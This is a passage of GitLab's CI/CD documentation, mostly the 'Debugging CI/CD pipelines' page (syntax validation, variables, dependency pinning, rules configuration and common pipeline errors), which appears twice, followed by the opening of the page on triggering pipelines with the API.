      - my-output.json
```

Reports configured with [`artifacts:reports`](yaml/artifacts_reports.md) are not available for download by default, but could also contain information to help with debugging. Use the same technique to make these reports available for inspection:

```yaml
job1:
  script:
    - rspec --format RspecJunitFormatter --out rspec.xml
  artifacts:
    reports:
      junit: rspec.xml
    paths:
      - rspec.xml
```

{{< alert type="warning" >}}

Do not save tokens, passwords, or other sensitive information in artifacts, as they could be viewed by any user with access to the pipelines.

{{< /alert >}}

### Run the job's commands locally

You can use a tool like [Rancher Desktop](https://rancherdesktop.io/) or similar alternatives to run the job's container image on your local machine. Then, run the job's `script` commands in the container and verify the behavior.

### Troubleshoot a failed job with Root Cause Analysis

You can use GitLab Duo Root Cause Analysis in GitLab Duo Chat to [troubleshoot failed CI/CD jobs](../user/gitlab_duo_chat/examples.md#troubleshoot-failed-cicd-jobs-with-root-cause-analysis).

## Job configuration issues

A lot of common pipeline issues can be fixed by analyzing the behavior of the `rules` or `only/except` configuration used to [control when jobs are added to a pipeline](jobs/job_control.md). You shouldn't use these two configurations in the same pipeline, as they behave differently. It's hard to predict how a pipeline runs with this mixed behavior. `rules` is the preferred choice for controlling jobs, as `only` and `except` are no longer being actively developed.
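As a sketch, a typical conversion from `only` to an equivalent `rules` clause looks like this. The job, script, and branch names are illustrative:

```yaml
# Before: deprecated only/except syntax
build-job:
  script: [./build.sh]
  only:
    - main

# After: the equivalent rules syntax
build-job:
  script: [./build.sh]
  rules:
    - if: $CI_COMMIT_BRANCH == "main"
```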
If your `rules` or `only/except` configuration makes use of [predefined variables](variables/predefined_variables.md) like `CI_PIPELINE_SOURCE` or `CI_MERGE_REQUEST_ID`, you should [verify them](#verify-variables) as the first troubleshooting step.

### Jobs or pipelines don't run when expected

The `rules` or `only/except` keywords are what determine whether or not a job is added to a pipeline. If a pipeline runs, but a job is not added to the pipeline, it's usually due to `rules` or `only/except` configuration issues. If a pipeline does not seem to run at all, with no error message, it might also be due to `rules` or `only/except` configuration, or the `workflow: rules` keyword.

If you are converting from `only/except` to the `rules` keyword, you should check the [`rules` configuration details](yaml/_index.md#rules) carefully. The behavior of `only/except` and `rules` is different and can cause unexpected behavior when migrating between the two. The [common `if` clauses for `rules`](jobs/job_rules.md#common-if-clauses-with-predefined-variables) can be very helpful for examples of how to write rules that behave the way you expect.

If a pipeline contains only jobs in the `.pre` or `.post` stages, it does not run. There must be at least one other job in a different stage.

### Unexpected behavior when `.gitlab-ci.yml` file contains a byte order mark (BOM)

A [UTF-8 Byte-Order Mark (BOM)](https://en.wikipedia.org/wiki/Byte_order_mark) in the `.gitlab-ci.yml` file or other included configuration files can lead to incorrect pipeline behavior. The byte order mark affects parsing of the file, causing some configuration to be ignored: jobs might be missing, and variables could have the wrong values. Some text editors could insert a BOM character if configured to do so.

If your pipeline has confusing behavior, you can check for the presence of BOM characters with a tool capable of displaying them.
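For example, from a shell you can inspect the first bytes of a file with `od`. A throwaway `sample-ci.yml` is written here for illustration; point the commands at your real configuration file instead:

```shell
# Write a file that starts with a UTF-8 BOM (octal \357\273\277 = hex ef bb bf):
printf '\357\273\277stages: [test]\n' > sample-ci.yml

# A file with a BOM starts with the bytes: ef bb bf
head -c 3 sample-ci.yml | od -An -tx1
```

If the first three bytes are anything other than `ef bb bf`, the file does not start with a UTF-8 BOM.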
The pipeline editor cannot display the characters, so you must use an external tool. See [issue 354026](https://gitlab.com/gitlab-org/gitlab/-/issues/354026) for more details. ### A job with the `changes` keyword runs unexpectedly A common reason a job is added to a pipeline unexpectedly is because the `changes` keyword always evaluates to true in certain cases. For example, `changes` is always true in certain pipeline types, including scheduled pipelines and pipelines for tags. The `changes` keyword is used in combination with [`only/except`](yaml/deprecated_keywords.md#onlychanges--exceptchanges) or [`rules`](yaml/_index.md#ruleschanges). It's recommended to only use `changes` with `if` sections in `rules` or `only/except` configuration that ensures the job is only added to branch pipelines or merge request pipelines. ### Two pipelines run at the same time Two pipelines can run when pushing a commit to a branch that has an open merge request associated with it. Usually one pipeline is a merge request pipeline, and the other is a branch pipeline. This situation is usually caused by the `rules` configuration, and there are several ways to [prevent duplicate pipelines](jobs/job_rules.md#avoid-duplicate-pipelines). ### No pipeline or the wrong type of pipeline runs Before a pipeline can run, GitLab evaluates all the jobs in the configuration and tries to add them to all available pipeline types. A pipeline does not run if no jobs are added to it at the end of the evaluation. If a pipeline did not run, it's likely that all the jobs had `rules` or `only/except` that blocked them from being added to the pipeline. If the wrong pipeline type ran, then the `rules` or `only/except` configuration should be checked to make sure the jobs are added to the correct pipeline type. For example, if a merge request pipeline did not run, the jobs may have been added to a branch pipeline instead. 
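One common pattern from the linked guidance is a `workflow:rules` block that prefers merge request pipelines and suppresses the redundant branch pipeline:

```yaml
workflow:
  rules:
    # Run merge request pipelines
    - if: $CI_PIPELINE_SOURCE == "merge_request_event"
    # Don't run branch pipelines if the branch has an open merge request
    - if: $CI_COMMIT_BRANCH && $CI_OPEN_MERGE_REQUESTS
      when: never
    # Run branch pipelines otherwise
    - if: $CI_COMMIT_BRANCH
```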
It's also possible that your [`workflow: rules`](yaml/_index.md#workflow) configuration blocked the pipeline, or allowed the wrong pipeline type.

If you are using pull mirroring, you can check the [troubleshooting entry for pull mirroring pipelines](../user/project/repository/mirror/troubleshooting.md#pull-mirroring-is-not-triggering-pipelines).

### Pipeline with many jobs fails to start

A pipeline that has more jobs than the instance's defined [CI/CD limits](../administration/settings/continuous_integration.md#set-cicd-limits) fails to start. To reduce the number of jobs in a single pipeline, you can split your `.gitlab-ci.yml` configuration into more independent [parent-child pipelines](pipelines/pipeline_architectures.md#parent-child-pipelines).

## Pipeline warnings

Pipeline configuration warnings are shown when you:

- [Validate configuration with the CI Lint tool](yaml/lint.md).
- [Manually run a pipeline](pipelines/_index.md#run-a-pipeline-manually).

### `Job may allow multiple pipelines to run for a single action` warning

When you use [`rules`](yaml/_index.md#rules) with a `when` clause without an `if` clause, multiple pipelines may run. Usually this occurs when you push a commit to a branch that has an open merge request associated with it.

To [prevent duplicate pipelines](jobs/job_rules.md#avoid-duplicate-pipelines), use [`workflow: rules`](yaml/_index.md#workflow) or rewrite your rules to control which pipelines can run.

## Pipeline errors

### `A CI/CD pipeline must run and be successful before merge` message

This message is shown if the [**Pipelines must succeed**](../user/project/merge_requests/auto_merge.md#require-a-successful-pipeline-for-merge) setting is enabled in the project and a pipeline has not yet run successfully. This also applies if the pipeline has not been created yet, or if you are waiting for an external CI service.
If you don't use pipelines for your project, then you should disable **Pipelines must succeed** so you can accept merge requests. ### `Checking ability to merge automatically` message If your merge request is stuck with a `Checking ability to merge automatically` message that does not disappear after a few minutes, you can try one of these workarounds: - Refresh the merge request page. - Close & Re-open the merge request. - Rebase the merge request with the `/rebase` [quick action](../user/project/quick_actions.md). - If you have already confirmed the merge request is ready to be merged, you can merge it with the `/merge` quick action. This issue is [resolved](https://gitlab.com/gitlab-org/gitlab/-/issues/229352) in GitLab 15.5. ### `Checking pipeline status` message This message displays with a spinning status icon ({{< icon name="spinner" >}}) when the merge request does not yet have a pipeline associated with the latest commit. This might be because: - GitLab hasn't finished creating the pipeline yet. - You are using an external CI service and GitLab hasn't heard back from the service yet. - You are not using CI/CD pipelines in your project. - You are using CI/CD pipelines in your project, but your configuration prevented a pipeline from running on the source branch for your merge request. - The latest pipeline was deleted (this is a [known issue](https://gitlab.com/gitlab-org/gitlab/-/issues/214323)). - The source branch of the merge request is on a private fork. After the pipeline is created, the message updates with the pipeline status. In some of these cases, the message might get stuck with the icon spinning endlessly if the [**Pipelines must succeed**](../user/project/merge_requests/auto_merge.md#require-a-successful-pipeline-for-merge) setting is enabled. See [issue 334281](https://gitlab.com/gitlab-org/gitlab/-/issues/334281) for more details. 
### `Project <group/project> not found or access denied` message This message is shown if configuration is added with [`include`](yaml/_index.md#include) and either: - The configuration refers to a project that can't be found. - The user that is running the pipeline is unable to access any included projects. To resolve this, check that: - The path of the project is in the format `my-group/my-project` and does not include any folders in the repository. - The user running the pipeline is a [member of the projects](../user/project/members/_index.md#add-users-to-a-project) that contain the included files. Users must also have the [permission](../user/permissions.md#cicd) to run CI/CD jobs in the same projects. ### `The parsed YAML is too big` message This message displays when the YAML configuration is too large or nested too deeply. YAML files with a large number of includes, and thousands of lines overall, are more likely to hit this memory limit. For example, a YAML file that is 200 kb is likely to hit the default memory limit. To reduce the configuration size, you can: - Check the length of the expanded CI/CD configuration in the pipeline editor's [Full configuration](pipeline_editor/_index.md#view-full-configuration) tab. Look for duplicated configuration that can be removed or simplified. - Move long or repeated `script` sections into standalone scripts in the project. - Use [parent and child pipelines](pipelines/downstream_pipelines.md#parent-child-pipelines) to move some work to jobs in an independent child pipeline. On GitLab Self-Managed, you can [increase the size limits](../administration/instance_limits.md#maximum-size-and-depth-of-cicd-configuration-yaml-files). ### `500` error when editing the `.gitlab-ci.yml` file A loop of included configuration files can cause a `500` error when editing the `.gitlab-ci.yml` file with the [web editor](../user/project/repository/web_editor.md). 
Ensure that included configuration files do not create a loop of references to each other. ### `Failed to pull image` messages {{< history >}} - **Allow access to this project with a CI_JOB_TOKEN** setting [renamed to **Limit access to this project**](https://gitlab.com/gitlab-org/gitlab/-/issues/411406) in GitLab 16.3. {{< /history >}} A runner might return a `Failed to pull image` message when trying to pull a container image in a CI/CD job. The runner authenticates with a [CI/CD job token](jobs/ci_job_token.md) when fetching a container image defined with [`image`](yaml/_index.md#image) from another project's container registry. If the job token settings prevent access to the other project's container registry, the runner returns an error message. For example: - ```plaintext WARNING: Failed to pull image with policy "always": Error response from daemon: pull access denied for registry.example.com/path/to/project, repository does not exist or may require 'docker login': denied: requested access to the resource is denied ``` - ```plaintext WARNING: Failed to pull image with policy "": image pull failed: rpc error: code = Unknown desc = failed to pull and unpack image "registry.example.com/path/to/project/image:v1.2.3": failed to resolve reference "registry.example.com/path/to/project/image:v1.2.3": pull access denied, repository does not exist or may require authorization: server message: insufficient_scope: authorization failed ``` These errors can happen if the following are both true: - The [**Limit access to this project**](jobs/ci_job_token.md#limit-job-token-scope-for-public-or-internal-projects) option is enabled in the private project hosting the image. - The job attempting to fetch the image is running in a project that is not listed in the private project's allowlist. 
To resolve this issue, add any projects with CI/CD jobs that fetch images from the container registry to the target project's [job token allowlist](jobs/ci_job_token.md#add-a-group-or-project-to-the-job-token-allowlist). These errors might also happen when trying to use a [project access token](../user/project/settings/project_access_tokens.md) to access images in another project. Project access tokens are scoped to one project, and therefore cannot access images in other projects. You must use [a different token type](../security/tokens/_index.md) with wider scope. ### `Something went wrong on our end` message or `500` error when running a pipeline You might receive the following pipeline errors: - A `Something went wrong on our end` message when pushing or creating merge requests. - A `500` error when using the API to trigger a pipeline. These errors can happen if records of internal IDs become out of sync after a project is imported. To resolve this, see the [workaround in issue 352382](https://gitlab.com/gitlab-org/gitlab/-/issues/352382#workaround). ### `config should be an array of hashes` error message You might see an error similar to the following when using [`!reference` tags](yaml/yaml_optimization.md#reference-tags) with the [`parallel:matrix` keyword](yaml/_index.md#parallelmatrix): ```plaintext This GitLab CI configuration is invalid: jobs:my_job_name:parallel:matrix config should be an array of hashes. ``` The `parallel:matrix` keyword does not support multiple `!reference` tags at the same time. Try using [YAML anchors](yaml/yaml_optimization.md#anchors) instead. [Issue 439828](https://gitlab.com/gitlab-org/gitlab/-/issues/439828) proposes improving `!reference` tag support in `parallel:matrix`.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Debugging CI/CD pipelines description: Configuration validation, warnings, errors, and troubleshooting. breadcrumbs: - doc - ci --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab provides several tools to help make it easier to debug your CI/CD configuration. If you are unable to resolve pipeline issues, you can get help from: - The [GitLab community forum](https://forum.gitlab.com/) - GitLab [Support](https://about.gitlab.com/support/) If you are having issues with a specific CI/CD feature, see the related troubleshooting section for that feature: - [Caching](caching/_index.md#troubleshooting). - [CI/CD job tokens](jobs/ci_job_token.md#troubleshooting). - [Container registry](../user/packages/container_registry/troubleshoot_container_registry.md). - [Docker](docker/docker_build_troubleshooting.md). - [Downstream pipelines](pipelines/downstream_pipelines_troubleshooting.md). - [Environments](environments/_index.md#troubleshooting). - [GitLab Runner](https://docs.gitlab.com/runner/faq/). - [ID tokens](secrets/id_token_authentication.md#troubleshooting). - [Jobs](jobs/job_troubleshooting.md). - [Job artifacts](jobs/job_artifacts_troubleshooting.md). - [Merge request pipelines](pipelines/mr_pipeline_troubleshooting.md), [merged results pipelines](pipelines/merged_results_pipelines.md#troubleshooting), and [merge trains](pipelines/merge_trains.md#troubleshooting). - [Pipeline editor](pipeline_editor/_index.md#troubleshooting). - [Variables](variables/variables_troubleshooting.md). - [YAML `includes` keyword](yaml/includes.md#troubleshooting). - [YAML `script` keyword](yaml/script_troubleshooting.md). 
## Debugging techniques ### Verify syntax An early source of problems can be incorrect syntax. The pipeline shows a `yaml invalid` badge and does not start running if any syntax or formatting problems are found. #### Edit `.gitlab-ci.yml` with the pipeline editor The [pipeline editor](pipeline_editor/_index.md) is the recommended editing experience (rather than the single file editor or the Web IDE). It includes: - Code completion suggestions that ensure you are only using accepted keywords. - Automatic syntax highlighting and validation. - The [CI/CD configuration visualization](pipeline_editor/_index.md#visualize-ci-configuration), a graphical representation of your `.gitlab-ci.yml` file. #### Edit `.gitlab-ci.yml` locally If you prefer to edit your pipeline configuration locally, you can use the GitLab CI/CD schema in your editor to verify basic syntax issues. Any [editor with Schemastore support](https://www.schemastore.org/json/#editors) uses the GitLab CI/CD schema by default. If you need to link to the schema directly, use this URL: ```plaintext https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/assets/javascripts/editor/schema/ci.json ``` To see the full list of custom tags covered by the CI/CD schema, check the latest version of the schema. #### Verify syntax with CI Lint tool You can use the [CI Lint tool](yaml/lint.md) to verify that the syntax of a CI/CD configuration snippet is correct. Paste in full `.gitlab-ci.yml` files or individual job configurations, to verify the basic syntax. When a `.gitlab-ci.yml` file is present in a project, you can also use the CI Lint tool to [simulate the creation of a full pipeline](yaml/lint.md#simulate-a-pipeline). It does deeper verification of the configuration syntax. ### Use pipeline names Use [`workflow:name`](yaml/_index.md#workflowname) to give names to all your pipeline types, which makes it easier to identify pipelines in the pipelines list. 
For example: ```yaml variables: PIPELINE_NAME: "Default pipeline name" workflow: name: '$PIPELINE_NAME' rules: - if: '$CI_PIPELINE_SOURCE == "merge_request_event"' variables: PIPELINE_NAME: "Merge request pipeline" - if: '$CI_PIPELINE_SOURCE == "schedule" && $PIPELINE_SCHEDULE_TYPE == "hourly_deploy"' variables: PIPELINE_NAME: "Hourly deployment pipeline" - if: '$CI_PIPELINE_SOURCE == "schedule"' variables: PIPELINE_NAME: "Other scheduled pipeline" - if: '$CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH' variables: PIPELINE_NAME: "Default branch pipeline" - if: '$CI_COMMIT_BRANCH =~ /^\d{1,2}\.\d{1,2}-stable$/' variables: PIPELINE_NAME: "Stable branch pipeline" ``` ### CI/CD variables #### Verify variables A key part of troubleshooting CI/CD is to verify which variables are present in a pipeline, and what their values are. A lot of pipeline configuration is dependent on variables, and verifying them is one of the fastest ways to find the source of a problem. [Export the full list of variables](variables/variables_troubleshooting.md#list-all-variables) available in each problematic job. Check if the variables you expect are present, and check if their values are what you expect. #### Use variables to add flags to CLI commands You can define CI/CD variables that are not used in standard pipeline runs, but can be used for debugging on demand. If you add a variable like in the following example, you can add it during manual runs of the [pipeline](pipelines/_index.md#run-a-pipeline-manually) or [individual job](jobs/job_control.md#run-a-manual-job) to modify the command's behavior. For example: ```yaml my-flaky-job: variables: DEBUG_VARS: "" script: - my-test-command $DEBUG_VARS /test-dirs ``` In this example, `DEBUG_VARS` is blank by default in standard pipelines. If you need to debug the job's behavior, run the pipeline manually and set `DEBUG_VARS` to `--verbose` for additional output. 
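The variable-verification step described above can be sketched as an on-demand job (the job name is illustrative; note that dumping variables can expose sensitive values in the job log):

```yaml
debug-variables:
  stage: .pre
  when: manual       # Run only on demand, so standard pipelines are unaffected
  script:
    - export | sort  # Print every variable available to the job, sorted alphabetically
```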
### Dependencies

Dependency-related issues are another common source of unexpected issues in pipelines.

#### Verify dependency versions

To validate that the correct versions of dependencies are being used in jobs, you can output them before running the main script commands. For example:

```yaml
job:
  before_script:
    - node --version
    - yarn --version
  script:
    - my-javascript-tests.sh
```

#### Pin versions

While you might want to always use the latest version of a dependency or image, an update could unexpectedly include breaking changes. Consider pinning key dependencies and images to avoid surprise changes. For example:

```yaml
variables:
  ALPINE_VERSION: '3.18.6'

job1:
  image: alpine:$ALPINE_VERSION  # This will never change unexpectedly
  script:
    - my-test-script.sh

job2:
  image: alpine:latest  # This might suddenly change
  script:
    - my-test-script.sh
```

You should still regularly check for dependency and image updates, as there might be important security updates. Then you can manually update the version as part of a process that verifies the updated image or dependency still works with your pipeline.

### Verify job output

#### Make output verbose

If you use `--silent` to reduce the amount of output in a job log, it can be difficult to identify what went wrong in a job. Consider using `--verbose` when possible, for extra detail.

```yaml
job1:
  script:
    - my-test-tool --silent         # If this fails, it might be impossible to identify the issue.
    - my-other-test-tool --verbose  # This command will likely be easier to debug.
```

#### Save output and reports as artifacts

Some tools might generate files that are only needed while the job is running, but the content of these files could be used for debugging.
You can save them for later analysis with [`artifacts`](yaml/_index.md#artifacts):

```yaml
job1:
  script:
    - my-tool --json-output my-output.json
  artifacts:
    paths:
      - my-output.json
```

Reports configured with [`artifacts:reports`](yaml/artifacts_reports.md) are not available for download by default, but could also contain information to help with debugging. Use the same technique to make these reports available for inspection:

```yaml
job1:
  script:
    - rspec --format RspecJunitFormatter --out rspec.xml
  artifacts:
    reports:
      junit: rspec.xml
    paths:
      - rspec.xml
```

{{< alert type="warning" >}}

Do not save tokens, passwords, or other sensitive information in artifacts, as they could be viewed by any user with access to the pipelines.

{{< /alert >}}

### Run the job's commands locally

You can use a tool like [Rancher Desktop](https://rancherdesktop.io/) or similar alternatives to run the job's container image on your local machine. Then, run the job's `script` commands in the container and verify the behavior.

### Troubleshoot a failed job with Root Cause Analysis

You can use GitLab Duo Root Cause Analysis in GitLab Duo Chat to [troubleshoot failed CI/CD jobs](../user/gitlab_duo_chat/examples.md#troubleshoot-failed-cicd-jobs-with-root-cause-analysis).

## Job configuration issues

A lot of common pipeline issues can be fixed by analyzing the behavior of the `rules` or `only/except` configuration used to [control when jobs are added to a pipeline](jobs/job_control.md).

You shouldn't use these two configurations in the same pipeline, as they behave differently. It's hard to predict how a pipeline runs with this mixed behavior. `rules` is the preferred choice for controlling jobs, as `only` and `except` are no longer being actively developed.
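For example, a minimal sketch of the preferred `rules` style (the job name and script are illustrative) that adds a job only to merge request pipelines and default branch pipelines:

```yaml
my-job:
  script:
    - my-test-script.sh
  rules:
    # Add the job to merge request pipelines
    - if: '$CI_PIPELINE_SOURCE == "merge_request_event"'
    # Add the job to pipelines for the default branch
    - if: '$CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH'
```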
If your `rules` or `only/except` configuration makes use of [predefined variables](variables/predefined_variables.md) like `CI_PIPELINE_SOURCE` or `CI_MERGE_REQUEST_ID`, you should [verify them](#verify-variables) as the first troubleshooting step.

### Jobs or pipelines don't run when expected

The `rules` or `only/except` keywords are what determine whether or not a job is added to a pipeline. If a pipeline runs, but a job is not added to the pipeline, it's usually due to `rules` or `only/except` configuration issues.

If a pipeline does not seem to run at all, with no error message, it may also be due to `rules` or `only/except` configuration, or the `workflow: rules` keyword.

If you are converting from `only/except` to the `rules` keyword, you should check the [`rules` configuration details](yaml/_index.md#rules) carefully. The behavior of `only/except` and `rules` is different and can cause unexpected behavior when migrating between the two.

The [common `if` clauses for `rules`](jobs/job_rules.md#common-if-clauses-with-predefined-variables) can be very helpful for examples of how to write rules that behave the way you expect.

If a pipeline contains only jobs in the `.pre` or `.post` stages, it does not run. There must be at least one other job in a different stage.

### Unexpected behavior when `.gitlab-ci.yml` file contains a byte order mark (BOM)

A [UTF-8 Byte-Order Mark (BOM)](https://en.wikipedia.org/wiki/Byte_order_mark) in the `.gitlab-ci.yml` file or other included configuration files can lead to incorrect pipeline behavior. The byte order mark affects parsing of the file, causing some configuration to be ignored: jobs might be missing, and variables could have the wrong values. Some text editors could insert a BOM character if configured to do so.

If your pipeline has confusing behavior, you can check for the presence of BOM characters with a tool capable of displaying them.
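For example, a quick command-line check using standard POSIX tools (a sketch; the file name is illustrative):

```shell
# "\357\273\277" is the UTF-8 BOM (0xEF 0xBB 0xBF) written as octal escapes.
# Create a sample configuration file that starts with a BOM:
printf '\357\273\277job:\n  script: [my-test-script.sh]\n' > sample-ci.yml

# Inspect the first three bytes in hex; a BOM shows up as "ef bb bf":
head -c 3 sample-ci.yml | od -An -tx1
```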
The pipeline editor cannot display the characters, so you must use an external tool. See [issue 354026](https://gitlab.com/gitlab-org/gitlab/-/issues/354026) for more details. ### A job with the `changes` keyword runs unexpectedly A common reason a job is added to a pipeline unexpectedly is because the `changes` keyword always evaluates to true in certain cases. For example, `changes` is always true in certain pipeline types, including scheduled pipelines and pipelines for tags. The `changes` keyword is used in combination with [`only/except`](yaml/deprecated_keywords.md#onlychanges--exceptchanges) or [`rules`](yaml/_index.md#ruleschanges). It's recommended to only use `changes` with `if` sections in `rules` or `only/except` configuration that ensures the job is only added to branch pipelines or merge request pipelines. ### Two pipelines run at the same time Two pipelines can run when pushing a commit to a branch that has an open merge request associated with it. Usually one pipeline is a merge request pipeline, and the other is a branch pipeline. This situation is usually caused by the `rules` configuration, and there are several ways to [prevent duplicate pipelines](jobs/job_rules.md#avoid-duplicate-pipelines). ### No pipeline or the wrong type of pipeline runs Before a pipeline can run, GitLab evaluates all the jobs in the configuration and tries to add them to all available pipeline types. A pipeline does not run if no jobs are added to it at the end of the evaluation. If a pipeline did not run, it's likely that all the jobs had `rules` or `only/except` that blocked them from being added to the pipeline. If the wrong pipeline type ran, then the `rules` or `only/except` configuration should be checked to make sure the jobs are added to the correct pipeline type. For example, if a merge request pipeline did not run, the jobs may have been added to a branch pipeline instead. 
It's also possible that your [`workflow: rules`](yaml/_index.md#workflow) configuration blocked the pipeline, or allowed the wrong pipeline type.

If you are using pull mirroring, you can check the [troubleshooting entry for pull mirroring pipelines](../user/project/repository/mirror/troubleshooting.md#pull-mirroring-is-not-triggering-pipelines).

### Pipeline with many jobs fails to start

A pipeline that has more jobs than the instance's defined [CI/CD limits](../administration/settings/continuous_integration.md#set-cicd-limits) fails to start.

To reduce the number of jobs in a single pipeline, you can split your `.gitlab-ci.yml` configuration into more independent [parent-child pipelines](pipelines/pipeline_architectures.md#parent-child-pipelines).

## Pipeline warnings

Pipeline configuration warnings are shown when you:

- [Validate configuration with the CI Lint tool](yaml/lint.md).
- [Manually run a pipeline](pipelines/_index.md#run-a-pipeline-manually).

### `Job may allow multiple pipelines to run for a single action` warning

When you use [`rules`](yaml/_index.md#rules) with a `when` clause without an `if` clause, multiple pipelines may run. Usually this occurs when you push a commit to a branch that has an open merge request associated with it.

To [prevent duplicate pipelines](jobs/job_rules.md#avoid-duplicate-pipelines), use [`workflow: rules`](yaml/_index.md#workflow) or rewrite your rules to control which pipelines can run.

## Pipeline errors

### `A CI/CD pipeline must run and be successful before merge` message

This message is shown if the [**Pipelines must succeed**](../user/project/merge_requests/auto_merge.md#require-a-successful-pipeline-for-merge) setting is enabled in the project and a pipeline has not yet run successfully. This also applies if the pipeline has not been created yet, or if you are waiting for an external CI service.
If you don't use pipelines for your project, then you should disable **Pipelines must succeed** so you can accept merge requests.

### `Checking ability to merge automatically` message

If your merge request is stuck with a `Checking ability to merge automatically` message that does not disappear after a few minutes, you can try one of these workarounds:

- Refresh the merge request page.
- Close and reopen the merge request.
- Rebase the merge request with the `/rebase` [quick action](../user/project/quick_actions.md).
- If you have already confirmed the merge request is ready to be merged, you can merge it with the `/merge` quick action.

This issue is [resolved](https://gitlab.com/gitlab-org/gitlab/-/issues/229352) in GitLab 15.5.

### `Checking pipeline status` message

This message displays with a spinning status icon ({{< icon name="spinner" >}}) when the merge request does not yet have a pipeline associated with the latest commit. This might be because:

- GitLab hasn't finished creating the pipeline yet.
- You are using an external CI service and GitLab hasn't heard back from the service yet.
- You are not using CI/CD pipelines in your project.
- You are using CI/CD pipelines in your project, but your configuration prevented a pipeline from running on the source branch for your merge request.
- The latest pipeline was deleted (this is a [known issue](https://gitlab.com/gitlab-org/gitlab/-/issues/214323)).
- The source branch of the merge request is on a private fork.

After the pipeline is created, the message updates with the pipeline status.

In some of these cases, the message might get stuck with the icon spinning endlessly if the [**Pipelines must succeed**](../user/project/merge_requests/auto_merge.md#require-a-successful-pipeline-for-merge) setting is enabled. See [issue 334281](https://gitlab.com/gitlab-org/gitlab/-/issues/334281) for more details.
### `Project <group/project> not found or access denied` message This message is shown if configuration is added with [`include`](yaml/_index.md#include) and either: - The configuration refers to a project that can't be found. - The user that is running the pipeline is unable to access any included projects. To resolve this, check that: - The path of the project is in the format `my-group/my-project` and does not include any folders in the repository. - The user running the pipeline is a [member of the projects](../user/project/members/_index.md#add-users-to-a-project) that contain the included files. Users must also have the [permission](../user/permissions.md#cicd) to run CI/CD jobs in the same projects. ### `The parsed YAML is too big` message This message displays when the YAML configuration is too large or nested too deeply. YAML files with a large number of includes, and thousands of lines overall, are more likely to hit this memory limit. For example, a YAML file that is 200 kb is likely to hit the default memory limit. To reduce the configuration size, you can: - Check the length of the expanded CI/CD configuration in the pipeline editor's [Full configuration](pipeline_editor/_index.md#view-full-configuration) tab. Look for duplicated configuration that can be removed or simplified. - Move long or repeated `script` sections into standalone scripts in the project. - Use [parent and child pipelines](pipelines/downstream_pipelines.md#parent-child-pipelines) to move some work to jobs in an independent child pipeline. On GitLab Self-Managed, you can [increase the size limits](../administration/instance_limits.md#maximum-size-and-depth-of-cicd-configuration-yaml-files). ### `500` error when editing the `.gitlab-ci.yml` file A loop of included configuration files can cause a `500` error when editing the `.gitlab-ci.yml` file with the [web editor](../user/project/repository/web_editor.md). 
Ensure that included configuration files do not create a loop of references to each other. ### `Failed to pull image` messages {{< history >}} - **Allow access to this project with a CI_JOB_TOKEN** setting [renamed to **Limit access to this project**](https://gitlab.com/gitlab-org/gitlab/-/issues/411406) in GitLab 16.3. {{< /history >}} A runner might return a `Failed to pull image` message when trying to pull a container image in a CI/CD job. The runner authenticates with a [CI/CD job token](jobs/ci_job_token.md) when fetching a container image defined with [`image`](yaml/_index.md#image) from another project's container registry. If the job token settings prevent access to the other project's container registry, the runner returns an error message. For example: - ```plaintext WARNING: Failed to pull image with policy "always": Error response from daemon: pull access denied for registry.example.com/path/to/project, repository does not exist or may require 'docker login': denied: requested access to the resource is denied ``` - ```plaintext WARNING: Failed to pull image with policy "": image pull failed: rpc error: code = Unknown desc = failed to pull and unpack image "registry.example.com/path/to/project/image:v1.2.3": failed to resolve reference "registry.example.com/path/to/project/image:v1.2.3": pull access denied, repository does not exist or may require authorization: server message: insufficient_scope: authorization failed ``` These errors can happen if the following are both true: - The [**Limit access to this project**](jobs/ci_job_token.md#limit-job-token-scope-for-public-or-internal-projects) option is enabled in the private project hosting the image. - The job attempting to fetch the image is running in a project that is not listed in the private project's allowlist. 
To resolve this issue, add any projects with CI/CD jobs that fetch images from the container registry to the target project's [job token allowlist](jobs/ci_job_token.md#add-a-group-or-project-to-the-job-token-allowlist). These errors might also happen when trying to use a [project access token](../user/project/settings/project_access_tokens.md) to access images in another project. Project access tokens are scoped to one project, and therefore cannot access images in other projects. You must use [a different token type](../security/tokens/_index.md) with wider scope. ### `Something went wrong on our end` message or `500` error when running a pipeline You might receive the following pipeline errors: - A `Something went wrong on our end` message when pushing or creating merge requests. - A `500` error when using the API to trigger a pipeline. These errors can happen if records of internal IDs become out of sync after a project is imported. To resolve this, see the [workaround in issue 352382](https://gitlab.com/gitlab-org/gitlab/-/issues/352382#workaround). ### `config should be an array of hashes` error message You might see an error similar to the following when using [`!reference` tags](yaml/yaml_optimization.md#reference-tags) with the [`parallel:matrix` keyword](yaml/_index.md#parallelmatrix): ```plaintext This GitLab CI configuration is invalid: jobs:my_job_name:parallel:matrix config should be an array of hashes. ``` The `parallel:matrix` keyword does not support multiple `!reference` tags at the same time. Try using [YAML anchors](yaml/yaml_optimization.md#anchors) instead. [Issue 439828](https://gitlab.com/gitlab-org/gitlab/-/issues/439828) proposes improving `!reference` tag support in `parallel:matrix`.
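A minimal sketch of the anchor-based workaround (the variable and job names are illustrative):

```yaml
.matrix-values: &matrix-values
  - PROVIDER: [aws, gcp]
    ENVIRONMENT: [staging, production]

deploy:
  parallel:
    matrix: *matrix-values  # The anchor resolves to an array of hashes
  script:
    - echo "Deploying to $PROVIDER $ENVIRONMENT"
```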
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Trigger pipelines with the API
breadcrumbs:
- doc
- ci
- triggers
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

To trigger a pipeline for a specific branch or tag, you can use an API call to the [pipeline triggers API endpoint](../../api/pipeline_triggers.md).

If you are [migrating to GitLab CI/CD](../migration/plan_a_migration.md), you can trigger GitLab CI/CD pipelines by calling the API endpoint from the other provider's jobs. For example, as part of a migration from [Jenkins](../migration/jenkins.md) or [CircleCI](../migration/circleci.md).

When authenticating with the API, you can use:

- A [pipeline trigger token](#create-a-pipeline-trigger-token) to trigger a branch or tag pipeline with the [pipeline triggers API endpoint](../../api/pipeline_triggers.md).
